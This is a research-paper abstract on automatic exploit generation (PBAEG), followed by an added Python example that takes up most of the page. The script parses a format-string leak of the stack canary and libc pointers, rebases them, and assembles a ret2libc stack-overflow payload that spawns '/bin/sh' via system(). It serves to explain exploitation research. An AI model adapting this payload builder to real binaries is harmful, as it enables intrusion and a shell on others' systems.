Research field: Strategies
Venue: Cybersecurity
Automatic exploit generation (AEG) is the process of automatically finding a program path that triggers a vulnerability and producing an exploit for it; vulnerability discovery in this setting normally relies on fuzzing and symbolic execution. Existing AEG systems usually assume an idealised target environment in which not all protection mechanisms are enabled, which does not reflect real attacks: current GCC toolchains enable all of these protections by default. We therefore propose the Protection Bypass Automatic Exploit Generator (PBAEG), an exploit generation system that automatically detects certain classes of stack overflow and format string vulnerabilities and combines the two to generate exploits. PBAEG locates both vulnerability types with symbolic execution and dynamic binary analysis, selects an exploit generation strategy according to the protection mechanisms present, and defeats Non-Executable (NX), Position-Independent Executable (PIE), stack canary and Address Space Layout Randomization (ASLR) protections. For cases that are otherwise hard to exploit, it applies advanced stack overflow exploitation techniques. We also use Docker to simulate a remote target and test PBAEG's ability to attack it. In our experiments PBAEG detected and exploited vulnerabilities in 124 binaries, 22 capture-the-flag binaries and 10 public software packages, in less time than existing AEG systems and covering more vulnerability types. PBAEG supports a wider range of exploitation techniques, emits exploits as pwntools script files, and the generated exploits were verified successfully against the simulated remote environment.
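To make the combined strategy concrete, the following Python script is an added example, not code from the paper or from the PBAEG project. It models the core step the abstract describes: a format-string read primitive leaks the stack canary, a code pointer in the PIE binary and a return address into libc; the leak is parsed and rebased; and a stack-overflow payload is built that rewrites the canary with its own value and returns into libc (ret2libc), which is what lets one exploit work with NX, PIE, canary and ASLR all enabled. The echoed probe line, the `%N$p` slot order, `BUF_SIZE` and every offset in `PIE_LEAK_OFF`, `LIBC_LEAK_OFF` and `LIBC` are constructed placeholders; on a real target they come from the binary and its libc. Values are packed with `struct` instead of pwntools so the script runs offline.

```python
import re
import struct

# --- Constructed sample data (not taken from the paper) ---------------------
# Output of a hypothetical format-string probe "%7$p,%9$p,%11$p" sent to a
# 64-bit target that echoes the result. Slot 7 is assumed to hold the stack
# canary, slot 9 a code pointer inside the PIE binary and slot 11 a return
# address into libc. Slots and all offsets below are placeholders.
LEAK_LINE = b"probe: 0x9a3c5f17b2d4e800,0x5581a7c0129d,0x7f3b5d2a8083\n"
LEAK_NAMES = ("canary", "pie_ptr", "libc_ptr")

PIE_LEAK_OFF = 0x129D      # leaked code pointer minus binary base (constructed)
LIBC_LEAK_OFF = 0x29083    # leaked return address minus libc base (constructed)
LIBC = {                   # gadget/symbol offsets inside libc (constructed)
    "ret": 0x29139,
    "pop_rdi": 0x2A3E5,
    "bin_sh": 0x1D8678,
    "system": 0x50D70,
}
BUF_SIZE = 64              # bytes from buffer start to the canary (constructed)


def p64(v: int) -> bytes:
    """Little-endian 64-bit pack, i.e. pwntools' p64 without the dependency."""
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


def parse_leak(line: bytes, names=LEAK_NAMES) -> dict:
    """Pull the %p-style hex words out of the echoed probe, in probe order."""
    words = re.findall(rb"0x[0-9a-fA-F]+", line)
    if len(words) < len(names):
        raise ValueError("probe did not echo every requested value")
    return {n: int(w, 16) for n, w in zip(names, words)}


def looks_like_canary(v: int) -> bool:
    """glibc's x86-64 canary keeps its lowest byte zero so string copies stop on it."""
    return v & 0xFF == 0 and v >> 8 != 0


def rebase(leaked: int, known_offset: int) -> int:
    """Turn a leaked pointer into a module base; bases are page-aligned under ASLR."""
    base = leaked - known_offset
    if base & 0xFFF:
        raise ValueError(f"0x{leaked:x} - 0x{known_offset:x} is not page-aligned; wrong offset?")
    return base


def required_leaks(prot: dict) -> set:
    """Which leaks a ret2libc chain needs, given which mitigations are enabled."""
    need = set()
    if prot.get("Canary"):
        need.add("canary")      # the overflow must rewrite the canary with itself
    if prot.get("ASLR"):
        need.add("libc_ptr")    # libc gadgets move with ASLR
    if prot.get("PIE"):
        need.add("pie_ptr")     # only needed if the chain uses in-binary gadgets
    return need


def build_ret2libc(canary: int, libc_base: int, bad_bytes: bytes = b"\n") -> bytes:
    """Payload: filler | canary | saved rbp | ret | pop rdi | "/bin/sh" | system.

    The leading `ret` keeps rsp 16-byte aligned when system() is entered,
    which glibc's SSE code paths require.
    """
    chain = [
        libc_base + LIBC["ret"],
        libc_base + LIBC["pop_rdi"],
        libc_base + LIBC["bin_sh"],
        libc_base + LIBC["system"],
    ]
    payload = b"A" * BUF_SIZE + p64(canary) + p64(0) + b"".join(p64(a) for a in chain)
    # gets()/fgets()-style readers truncate at a newline; catch that before sending.
    for b in bad_bytes:
        if bytes([b]) in payload:
            raise ValueError(f"payload contains bad byte 0x{b:02x}")
    return payload


def generate(leak_line: bytes = LEAK_LINE) -> bytes:
    """Leak -> rebase -> overflow payload, the combination the abstract describes."""
    leak = parse_leak(leak_line)
    if not looks_like_canary(leak["canary"]):
        raise ValueError("leaked value does not look like a canary; wrong %N$p slot?")
    libc_base = rebase(leak["libc_ptr"], LIBC_LEAK_OFF)
    rebase(leak["pie_ptr"], PIE_LEAK_OFF)   # sanity-check the PIE leak as well
    return build_ret2libc(leak["canary"], libc_base)


if __name__ == "__main__":
    print(generate().hex())
```

In a pwntools-based generator the `p64` helper is replaced by pwntools' own, and `LEAK_LINE` comes from `process()` or `remote()` after the probe is sent; the alignment check in `rebase` and the canary low-byte check are the two cheap tests that catch a mis-guessed `%N$p` slot or a wrong libc build before any payload is sent.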
| Year published | 2025 |
|---|---|
| Citations | 0 |
| Country of publication | Andorra, China |
| Site | Springer |
| Likes | 0 |